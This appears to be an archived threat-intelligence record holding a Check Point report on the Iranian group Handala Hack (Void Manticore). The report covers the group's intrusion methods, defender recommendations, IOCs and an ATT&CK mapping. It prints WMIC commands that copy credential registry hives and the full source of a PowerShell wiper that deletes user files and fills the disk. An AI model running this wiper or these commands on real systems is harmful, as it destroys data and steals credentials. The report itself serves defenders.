{ "id": "950e699a-0afb-47f6-8247-7a6f1cd865dc", "created_at": "2026-04-29T08:21:21.414302Z", "updated_at": "2026-04-29T10:42:34.37288Z", "deleted_at": null, "sha1_hash": "979f227e0a49d53b1ede7ef459392e5a992b33aa", "title": "“Handala Hack” – Unveiling Group’s Modus Operandi", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 86493, "plain_text": "“Handala Hack” – Unveiling Group’s Modus Operandi\r\nBy matthewsu\r\nPublished: 2026-03-12 · Archived: 2026-04-29 07:11:44 UTC\r\nKey Findings\r\nHandala Hack is an online persona operated by Void Manticore (aka Red Sandstorm, Banished Kitten), an\r\nactor affiliated with Iranian Ministry of Intelligence and Security (MOIS)\r\nAdditional personas associated with this actor include Karma and Homeland Justice, which have been used\r\nin targeted operations against Israel and Albania\r\nHandala continues to rely on longstanding TTPs, primarily conducting quick, hands-on activity within\r\nvictim networks and employing multiple wiping methods simultaneously\r\nIn parallel, some newly observed TTPs include the deployment of NetBird to tunnel traffic into the\r\nnetwork, as well as the use of an AI-assisted PowerShell script for wiping activity\r\nIntroduction\r\nHandala Hack, also tracked by Check Point Research as Void Manticore, is an Iranian threat actor that is known\r\nfor multiple destructive wiping attacks combined with “hack and leak” operations. The threat actor operates\r\nseveral online personas, with the most prominent among them being Homeland Justice, maintained from mid-2022 specifically for multiple attacks against government, telecom, and other sectors in Albania, as well as\r\nHandala Hack, which has been responsible for multiple intrusions in Israel and recently expanding its targeting to\r\nUS-based enterprises such as medical technology giant Stryker.\r\nThe techniques, tactics, and procedures (TTPs) associated with Void Manticore intrusions remained largely\r\nconsistent throughout 2024 to 2026, as the group continued to rely primarily on manual, hands-on operations, off-the-shelf wipers, and publicly available deletion and encryption tools. Accordingly, our previous research on the\r\nactor, published in early 2025, remains highly relevant to understanding their activity. Void Manticore has\r\nhistorically used both custom-built and publicly available tools, while also relying on underground criminal\r\nservices to obtain initial access and malware.\r\nAs the group’s operations expanded in scope, with recent attacks targeting U.S. organizations, we decided to share\r\nour observations on this cluster’s activity, with a particular focus on recent TTPs and newly identified indicators.\r\nBecause the group operates primarily through manual, hands-on activity, its indicators tend to be short-lived and\r\nconsist largely of commercial VPN services, open-source software, and publicly available offensive security tools.\r\nBackground\r\n“Handala Hack” is an online persona operated by Void Manticore (Red Sandstorm, Banished Kitten), a MOIS-affiliated threat actor, and appears to draw its name and imagery from the Palestinian cartoon character Handala.\r\nThe persona has been used extensively since late 2023 and represents one of the group’s three primary operational\r\nhttps://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/\r\nPage 1 of 11\n\nfronts. The other two are Karma, which was likely completely replaced by Handala, and Homeland Justice, a\r\npersona the group continues to use in operations targeting Albania.\r\nLogos of Void Manticore personas (from left to right): Homeland Justice, Handala and Karma.\r\nFigure 1 – Logos of Void Manticore personas (from left to right): Homeland Justice, Handala and\r\nKarma.\r\nBased on our observations, intrusions linked to all three personas exhibit highly similar TTPs, as well as code\r\noverlaps in the wipers they deploy. Another distinctive characteristic shared by Karma and “Homeland Justice”\r\nis the collaboration with Scarred Manticore, a separate Iranian threat actor. In the case of Handala and Karma,\r\nwe have also observed incidents in which the victim-facing group (i.e., messaging within the wipers, notes left in\r\na compromised environment) was presented as Karma, while the stolen data was ultimately leaked through\r\nHandala.\r\nOperational interconnections of Void Manticore\r\nFigure 2 – Operational interconnections of Void Manticore\r\nOne possible explanation is that Karma and Handala initially represented two separate teams or operational efforts\r\nwithin the same organization, but later converged under a single brand. This would be consistent with Karma’s\r\ncomplete disappearance and Handala’s emergence as the dominant public-facing persona.\r\nAccording to public reporting, Void Manticore overlaps with activity linked to the MOIS Internal Security\r\nDeputy, particularly its Counter-Terrorism (CT) Division, operating under the supervision of Seyed Yahya\r\nHosseini Panjaki. Panjaki was reportedly killed in the opening phase of Israel’s strikes on Iran in early March\r\n2026.\r\nInitial Access\r\nSupply Chain Attacks\r\nHandala has consistently targeted IT and service providers in an effort to obtain credentials, relying largely on\r\ncompromised VPN accounts for initial access. Throughout the last months, we identified hundreds of logon and\r\nbrute-force attempts against organizational VPN infrastructure linked to Handala-associated infrastructure. This\r\nactivity typically originates from commercial VPN nodes and is frequently tied to default hostnames in the format\r\nDESKTOP-XXXXXX OR WIN-XXXXXX.\r\nAfter the internet shutdown in Iran in January, we observed similar activity originating from Starlink IP ranges,\r\nand it has continued since. This has occurred in parallel with a decline in the actor’s operational security, as the\r\ngroup has also begun connecting directly to victims from Iranian IP addresses.\r\nPreviously, the adversary generally maintained stronger operational discipline, typically egressing through the\r\ncommercial VPN segment 169.150.227.X while operating against targets in Israel. In some cases, however, the\r\nVPN connection failed, exposing communications from Iranian IP addresses or from a virtual private server. Since\r\nthe start of the war, the actor has struggled to maintain this level of operational security. At times, it successfully\r\nhttps://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/\r\nPage 2 of 11\n\negressed through an Israeli node, 146.185.219[.]235, assessed to be linked to a VPN service, although this differed\r\nfrom the segment previously used.\r\nActivity Before Impact\r\nIn a recent intrusion attributed to Handala, initial access is believed to have been established well before the\r\ndestructive phase, with network access dating back several months. This earlier activity likely provided the group\r\nwith persistent access and the Domain Administrator credentials required to carry out the attack. In the hours\r\nleading up to the destructive activity, Handala appeared to validate its access and test authentication using the\r\ncompromised credentials.\r\nIt is unclear whether this activity is directly associated with Handala, as it slightly differs from their typical TTPs.\r\nThe actor disabled Windows Defender protections and executed multiple reconnaissance and credential-theft\r\noperations. Shortly afterwards, the attacker attempted to retrieve an additional payload from a dedicated\r\ncommand-and-control server (107.189.19[.]52).\r\nThe adversary then proceeded with credential extraction using multiple techniques. These included dumping the\r\nLSASS process using comsvcs.dll via rundll32.exe, as well as exporting sensitive registry hives such as HKLM.\r\nIn parallel, the attacker executed ADRecon (named dra.ps1), a PowerShell-based reconnaissance framework used\r\nto enumerate Active Directory environments. At this point, it likely achieved Domain Admin credentials used in\r\n“Handala”s wiping attack.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nwmic.exe /node:[REDACTED_HOSTNAME] /user:[REDACTED] /password:[REDACTED] process call create\r\n\"cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\system\r\nc:\\users\\public”\r\nwmic.exe /node:[REDACTED_HOSTNAME] /user:[REDACTED] /password:[REDACTED] process call create\r\n\"cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\system\r\nc:\\users\\public”\r\nwmic.exe /node:[REDACTED_HOSTNAME] /user:[REDACTED] /password:[REDACTED] process call create \"cmd.exe\r\nLateral Movement\r\nHandala is known to operate primarily in a manual, hands-on manner, with lateral movement conducted largely\r\nthrough extensive use of RDP to move between systems within a compromised environment. To reach hosts that\r\nwere not directly accessible from outside the network, the group was observed deploying NetBird, a platform\r\ndesigned to create secure, private zero-trust mesh networks.\r\nhttps://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/\r\nPage 3 of 11\n\nThe deployment of NetBird was performed manually. The attackers first connected to compromised hosts via RDP\r\nand then used the local web browser to download the software directly from the official NetBird website.\r\nBy installing NetBird on multiple machines within the environment, the attackers were able to establish internal\r\nconnectivity between systems and operate more efficiently. This approach enabled them to accelerate destructive\r\nactivity while maintaining control of the operation from multiple footholds inside the network. During the\r\nincident, we observed at least five distinct attacker-controlled machines operating simultaneously within the\r\nenvironment.\r\nWiping Operations\r\nDuring the destructive phase of the attack, we observed the group deploying four distinct wiping techniques in\r\nparallel, likely to maximize impact and inflict the greatest possible damage. To further increase the effect, the\r\nthreat actor used Group Policy to distribute the different wipers across the network.\r\nHandala Wiper\r\nThe first stage involved the deployment of a custom wiper, referred to as Handala Wiper (in some instances\r\nnamed handala.exe).\r\nThe wiper was distributed across the network as a scheduled task using Group Policy logon scripts, which\r\nexecuted a batch file named handala.bat. This script simply triggered the execution of two wiper components – the\r\nexecutable and the PowerShell script. Notably, the executable itself was launched remotely from the Domain\r\nController (DC) and was not written to disk on the affected machines. The malware overwrites file contents across\r\nthe system and additionally leverages MBR-based wiping techniques to corrupt or destroy files on the system,\r\ncontributing to significant data loss.\r\nFigure 3 – Wiper execution of Handala Wiper\r\nHandala PowerShell Wiper\r\nAs a final stage of the destructive operation, the attackers deployed an additional custom PowerShell-based\r\nwiper. Similar to the previous component, this script was also distributed through Group Policy logon scripts,\r\nallowing it to propagate across multiple systems within the network.\r\nThe PowerShell wiper performs a straightforward but effective operation: it enumerates all files within users\r\ndirectories and deletes them, further compounding the damage caused by the initial wiping activity. Based on the\r\nhttps://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/\r\nPage 4 of 11\n\ncode structure and the detailed comments, it is likely that this PowerShell script was developed with AI assistance.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n$usersFolder = C:\\Users\r\n# Ensure the folder exists\r\nif (Test-Path $usersFolder) {\r\n# Get all items in C:\\Users, but not the Users folder itself\r\n$items = Get-ChildItem -Path $usersFolder -Recurse\r\n# Remove each item (files and subfolders) inside C:\\Users\r\nforeach ($item in $items) {\r\ntry {\r\nRemove-Item -Path $item.FullName -Recurse -Force -ErrorAction Stop\r\n} catch {\r\nWrite-Host Could not delete: $($item.FullName)\r\n}\r\n}\r\n}\r\n$sourceFile = \\\\[REDACTED]\\SYSVOL\\[REDACTED]\\scripts\\Administtration\\install\\handala.rar\r\n$destinationFolder = C:\\users\r\nif (!(Test-Path $destinationFolder)) {\r\nNew-Item -ItemType Directory -Path $destinationFolder | Out-Null\r\n}\r\n$driveLetter = (Split-Path $destinationFolder -Qualifier).TrimEnd(':','\\')\r\n$i = 0\r\nhttps://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/\r\nPage 5 of 11\n\nwhile ((Get-PSDrive $driveLetter).Free -gt (Get-Item $sourceFile).Length) {\r\nCopy-Item $sourceFile $destinationFolder\\Handala_$i.gif\r\n$i++\r\n}\r\n$usersFolder = C:\\Users # Ensure the folder exists if (Test-Path $usersFolder) { # Get all items in C:\\Users, but\r\nnot the Users folder itself $items = Get-ChildItem -Path $usersFolder -Recurse # Remove each item (files and\r\nsubfolders) inside C:\\Users foreach ($item in $items) { try { Remove-Item -Path $item.FullName -Recurse -Force\r\n-ErrorAction Stop } catch { Write-Host Could not delete: $($item.FullName) } } } $sourceFile = \\\\\r\n[REDACTED]\\SYSVOL\\[REDACTED]\\scripts\\Administtration\\install\\handala.rar $destinationFolder = C:\\users\r\nif (!(Test-Path $destinationFolder)) { New-Item -ItemType Directory -Path $destinationFolder | Out-Null }\r\n$driveLetter = (Split-Path $destinationFolder -Qualifier).TrimEnd(':','\\') $i = 0 while ((Get-PSDrive\r\n$driveLetter).Free -gt (Get-Item $sourceFile).Length) { Copy-Item $sourceFile $destinationFolder\\Handala_$i.gif\r\n$i++ }\r\n$usersFolder = C:\\Users\r\n \r\n# Ensure the folder exists\r\nif (Test-Path $usersFolder) {\r\n # Get all items in C:\\Users, but not the Users folder itself\r\n $items = Get-ChildItem -Path $usersFolder -Recurse\r\n \r\n # Remove each item (files and subfolders) inside C:\\Users\r\n foreach ($item in $items) {\r\n try {\r\n Remove-Item -Path $item.FullName -Recurse -Force -ErrorAction Stop\r\n } catch {\r\n Write-Host Could not delete: $($item.FullName)\r\n }\r\n }\r\n}\r\n \r\n \r\n \r\n$sourceFile = \\\\[REDACTED]\\SYSVOL\\[REDACTED]\\scripts\\Administtration\\install\\handala.rar\r\n$destinationFolder = C:\\users\r\n \r\n \r\nif (!(Test-Path $destinationFolder)) {\r\n New-Item -ItemType Directory -Path $destinationFolder | Out-Null\r\n}\r\n \r\n$driveLetter = (Split-Path $destinationFolder -Qualifier).TrimEnd(':','\\')\r\nhttps://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/\r\nPage 6 of 11\n\n$i = 0\r\n \r\nwhile ((Get-PSDrive $driveLetter).Free -gt (Get-Item $sourceFile).Length) {\r\n Copy-Item $sourceFile $destinationFolder\\Handala_$i.gif\r\n $i++\r\n}\r\nUse of Disk Encryption for Destruction\r\nIn addition to the custom wiping tools, we observed the attackers attempting to leverage VeraCrypt, a legitimate\r\nand widely used disk encryption utility. In this case, the attacker connected to the compromised host via RDP and\r\nused the system’s default web browser to download the software directly from the official website. By encrypting\r\nthe system drives using a legitimate tool, the attackers added an additional layer to the destructive process. This\r\ntechnique not only increases the operational impact but can also complicate recovery efforts, as encrypted disks\r\nmay remain inaccessible even if other wiping components fail or are only partially successful.\r\nManual Deletion\r\nIn some cases, Handala Hack operators manually delete virtual machines directly from the virtualization platform\r\nor files from compromised machines. This straightforward process involves logging in via RDP, selecting all files,\r\nand deleting them. We observed this behavior in several incidents, and it is also documented in Handala Hack’s\r\nown videos and leaked materials.\r\nSummary\r\nIn this report, we detailed the background of the “Handala Hack” persona and its links to Void Manticore, an actor\r\naffiliated with Iran’s Ministry of Intelligence and Security (MOIS). Handala is not the only persona maintained by\r\nthis actor, which operates several fronts in campaigns targeting the United States, Israel, and Albania.\r\nLike many destructive threat actors, Handala relies on relatively simple TTPs, largely aiming for quick,\r\nopportunistic wins through hands-on operations against its targets. These activities include gaining initial access\r\nthrough compromised credentials, moving laterally via RDP and basic tunneling tools, and deploying wipers\r\nalongside manual destructive actions. Their modus operandi has not shifted significantly, and strengthening\r\ndefenses against these techniques remains an effective way to counter this threat.\r\nRecommendations for Defenders\r\nEnforce multi-factor authentication, especially for remote access and privileged accounts\r\nMonitor for the use of compromised credentials and suspicious authentication activity, with an emphasis on\r\nthe following:\r\nLogins from countries not previously observed for your organization or specific users\r\nUnusual access patterns, including:\r\nFirst-time logins outside typical hours\r\nMultiple failed logins followed by success\r\nhttps://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/\r\nPage 7 of 11\n\nNew device registrations\r\nUnusual data transfer volumes during VPN sessions\r\nAuthentication from new ASN/hosting providers\r\nRestrict access from high-risk geographies and infrastructure\r\nBlock inbound connections from Iran at the perimeter and on remote access services\r\n(VPN/SSO), unless there is a verified business need\r\nBlock or tightly restrict Starlink IP ranges, given observed abuse in Iranian actor operations\r\nIf full blocking is not feasible, implement conditional access controls, increased\r\nauthentication requirements, and enhanced monitoring for these ranges\r\nConsider temporarily tightening remote access policies If operationally possible, temporarily restrict\r\nVPN connectivity to to business related countries only, with exceptions approved based on business\r\nneed (e.g., whitelisted users/locations, dedicated jump hosts, or managed devices only).\r\nRestrict and harden RDP access across the environment; disable it where not operationally required.\r\nActively search for RDP access from machines with the default Windows naming conventions (i.e\r\nDESKTOP-XXXXXX OR WIN-XXXXXXXX), specially outside of working hours\r\nMonitor for the use of potentially unwanted software, including remote management and monitoring\r\n(RMM) tools, VPN applications such as NetBird, and tunneling utilities such as SSH for windows\r\nIOCs\r\nType IOC\r\nHandala Wiper 5986ab04dd6b3d259935249741d3eff2\r\nHandala Powershell Wiper 3cb9dea916432ffb8784ac36d1f2d3cd\r\nVeraCrypt Installer 3236facc7a30df4ba4e57fddfba41ec5\r\nNetBird Installer 3dfb151d082df7937b01e2bb6030fe4a\r\nNetBird e035c858c1969cffc1a4978b86e90a30\r\nHandala VPS 82.25.35[.]25\r\nHandala VPS 31.57.35[.]223\r\nHandala VPS 107.189.19[.]52\r\nVPN exit node used by Handala 146.185.219[.]235\r\nStarlink IP range used by Handala 188.92.255.X\r\nStarlink IP range used by Handala 209.198.131.X\r\nCommercial VPN IP range used by Handala 149.88.26.X\r\nCommercial VPN IP range used by Handala 169.150.227.X\r\nhttps://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/\r\nPage 8 of 11\n\nHandala Machine Names\r\nWIN-P1B7V100IIS\r\nDESKTOP-FK1NPHF\r\nDESKTOP-R1FMLQP\r\nWIN-DS6S0HEU0CA\r\nDESKTOP-T3SOB36\r\nWIN-GPPA5GI4QQJ\r\nVULTR-GUEST\r\nDESKTOP-HU45M79\r\nDESKTOP-TNFP4JF\r\nDESKTOP-14O69KQ\r\nDESKTOP-9KG46L1\r\nDESKTOP-G2MH4KD\r\nWIN-DS6S0HEU0CA\r\nWIN-GPPA5GI4QQJ\r\nMITRE ATT\u0026CK Breakdown\r\nATT\u0026CK\r\nTactic\r\nTechnique Observed Activity\r\nInitial Access\r\nT1133 – External Remote\r\nServices\r\nUse of compromised VPN access\r\nfor entry into victim environments.\r\nInitial Access\r\nT1078.002 – Valid Accounts:\r\nDomain Accounts\r\nUse of stolen/supplied credentials,\r\nincluding Domain Admin\r\ncredentials.\r\nInitial Access T1199 – Trusted Relationship\r\nTargeting of IT and service\r\nproviders.\r\nCredential\r\nAccess\r\nT1110 – Brute Force\r\nRepeated logon and brute-force\r\nattempts against VPN\r\ninfrastructure.\r\nhttps://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/\r\nPage 9 of 11\n\nATT\u0026CK\r\nTactic\r\nTechnique Observed Activity\r\nCredential\r\nAccess\r\nT1003.001 – OS Credential\r\nDumping: LSASS Memory\r\nLSASS dumping via rundll32 and\r\ncomsvcs.dll.\r\nCredential\r\nAccess\r\nT1003.002 – OS Credential\r\nDumping: Security Account\r\nManager\r\nExport of sensitive registry hives\r\nfor credential extraction.\r\nDiscovery\r\nT1087.002 – Account Discovery:\r\nDomain Account\r\nADRecon used to enumerate the\r\nActive Directory environment.\r\nLateral\r\nMovement\r\nT1021.001 – Remote Services:\r\nRemote Desktop Protocol\r\nExtensive hands-on lateral\r\nmovement over RDP.\r\nCommand and\r\nControl\r\nT1572 – Protocol Tunneling\r\nNetBird used to tunnel traffic and\r\nreach internal hosts.\r\nExecution T1105 – Ingress Tool Transfer\r\nNetBird and VeraCrypt downloaded\r\ndirectly onto victim systems.\r\nExecution\r\nT1047 – Windows Management\r\nInstrumentation\r\nWMIC was used to run commands.\r\nExecution /\r\nPersistence\r\nT1484.001 – Group Policy\r\nModification\r\nWipers distributed via GPO.\r\nExecution /\r\nPersistence\r\nT1037.003 – Network Logon\r\nScript\r\nLogon scripts used to trigger\r\ndestructive components.\r\nExecution T1053.005 – Scheduled Task\r\nHandala wiper launched as a\r\nscheduled task.\r\nExecution T1059.001 – PowerShell\r\nAI-assisted PowerShell wiper used\r\nfor destructive activity.\r\nImpact T1561.002 – Disk Structure Wipe\r\nMBR-based wiping by the custom\r\nHandala wiper.\r\nImpact T1485 – Data Destruction\r\nFile deletion, manual deletion, and\r\ndestructive cleanup.\r\nImpact\r\nT1486 – Data Encrypted for\r\nImpact\r\nVeraCrypt used to encrypt disks as\r\npart of the attack.\r\nhttps://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/\r\nPage 10 of 11\n\nSource: https://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/\r\nhttps://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/" ], "report_names": [ "handala-hack-unveiling-groups-modus-operandi" ], "threat_actors": [ { "id": "9df96153-0450-4cbb-8a13-b737f16394ef", "created_at": "2023-11-03T02:00:07.788769Z", "updated_at": "2026-04-29T10:39:53.412049Z", "deleted_at": null, "main_name": "Scarred Manticore", "aliases": [], "source_name": "MISPGALAXY:Scarred Manticore", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "72fea432-77a6-437a-b02d-693e99d81ef9", "created_at": "2024-02-17T02:00:03.861221Z", "updated_at": "2026-04-29T10:39:53.68676Z", "deleted_at": null, "main_name": "BANISHED KITTEN", "aliases": [ "Storm-0842", "Red Sandstorm" ], "source_name": "MISPGALAXY:BANISHED KITTEN", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "13e58cc3-9acc-4564-8f84-b8cc0082ee4a", "created_at": "2024-05-23T02:00:03.982213Z", "updated_at": "2026-04-29T10:39:53.735425Z", "deleted_at": null, "main_name": "Void Manticore", "aliases": [], "source_name": "MISPGALAXY:Void Manticore", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4134675e-5b72-4b50-8d70-1a8f18aafbb4", "created_at": "2024-10-04T02:00:04.766263Z", "updated_at": "2026-04-29T10:39:53.796517Z", "deleted_at": null, "main_name": "Handala", "aliases": [], "source_name": "MISPGALAXY:Handala", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "704af71f-d1ed-4252-88a9-d23a17e4b7b4", "created_at": "2026-04-29T02:00:04.621965Z", "updated_at": "2026-04-29T10:39:54.777343Z", "deleted_at": null, "main_name": "VOID MANTICORE", "aliases": [ "VOID MANTICORE", "COBALT MYSTIQUE", "Handala Hack", "Homeland Justice", "Karma", "Karmabelow80", "BANISHED KITTEN", "Red Sandstorm" ], "source_name": "MITRE:VOID MANTICORE", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "7f25e108-e694-49b6-a494-c8458b33eb3f", "created_at": "2024-01-09T02:00:04.199217Z", "updated_at": "2026-04-29T10:39:53.616119Z", "deleted_at": null, "main_name": "HomeLand Justice", "aliases": [], "source_name": "MISPGALAXY:HomeLand Justice", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "20c759c2-cd02-45bb-85c6-41bde9e6a7cf", "created_at": "2024-01-18T02:02:34.189827Z", "updated_at": "2026-04-29T10:39:55.326323Z", "deleted_at": null, "main_name": "HomeLand Justice", "aliases": [ "Banished Kitten", "Karma", "Red Sandstorm", "Storm-0842", "Void Manticore" ], "source_name": "ETDA:HomeLand Justice", "tools": [ "BABYWIPER", "BiBi Wiper", "BiBi-Linux Wiper", "BiBi-Windows Wiper", "Cl Wiper", "LowEraser", "No-Justice Wiper", "Plink", "PuTTY Link", "RevSocks", "W2K Res Kit" ], "source_id": "ETDA", "reports": null }, { "id": "b3ebf51d-8f64-48a9-bbfb-674db872cccb", "created_at": "2025-08-07T02:03:24.769383Z", "updated_at": "2026-04-29T10:39:54.836181Z", "deleted_at": null, "main_name": "COBALT MYSTIQUE", "aliases": [ "Banished Kitten ", "DEV-0842 ", "Druidfly ", "Handala Hack Team", "Homeland Justice", "Karmabelow80", "Red Sandstorm ", "Storm-0842 ", "Void Manticore " ], "source_name": "Secureworks:COBALT MYSTIQUE", "tools": [ "AllinOneNeo", "Bibi", "GramPy", "GramPyLoader" ], "source_id": "Secureworks", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-29T10:39:55.397649Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1777450881, "ts_updated_at": 1777459354, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/979f227e0a49d53b1ede7ef459392e5a992b33aa.pdf", "text": "https://archive.orkl.eu/979f227e0a49d53b1ede7ef459392e5a992b33aa.txt", "img": "https://archive.orkl.eu/979f227e0a49d53b1ede7ef459392e5a992b33aa.jpg" } }